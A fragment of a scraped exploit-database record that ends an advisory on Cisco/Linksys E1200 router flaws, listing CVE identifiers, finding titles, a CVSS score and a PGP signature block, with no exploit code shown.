CVE-2013-2681\r\n\r\nFrameable response (Clickjacking) CVE-2013-2682\r\n\r\nPrivate IP addresses disclosed CVE-2013-2683\r\n\r\nHTML does not specify charset CVE-2013-2684\r\n\r\nCVSS Version 2 Score = 4.5\r\n\r\n=============================================\r\n\r\nEND\r\n\r\n=============================================\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 10.2.0.2526\r\n\r\nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\r\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\r\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\r\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\r\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\r\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\r\n=w123\r\n-----END PGP SIGNATURE-----", "sourceHref": "https://www.exploit-db.com/download/25292", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}

Re: Cisco/Linksys E1200 N300 Reflected XSS

Description

Related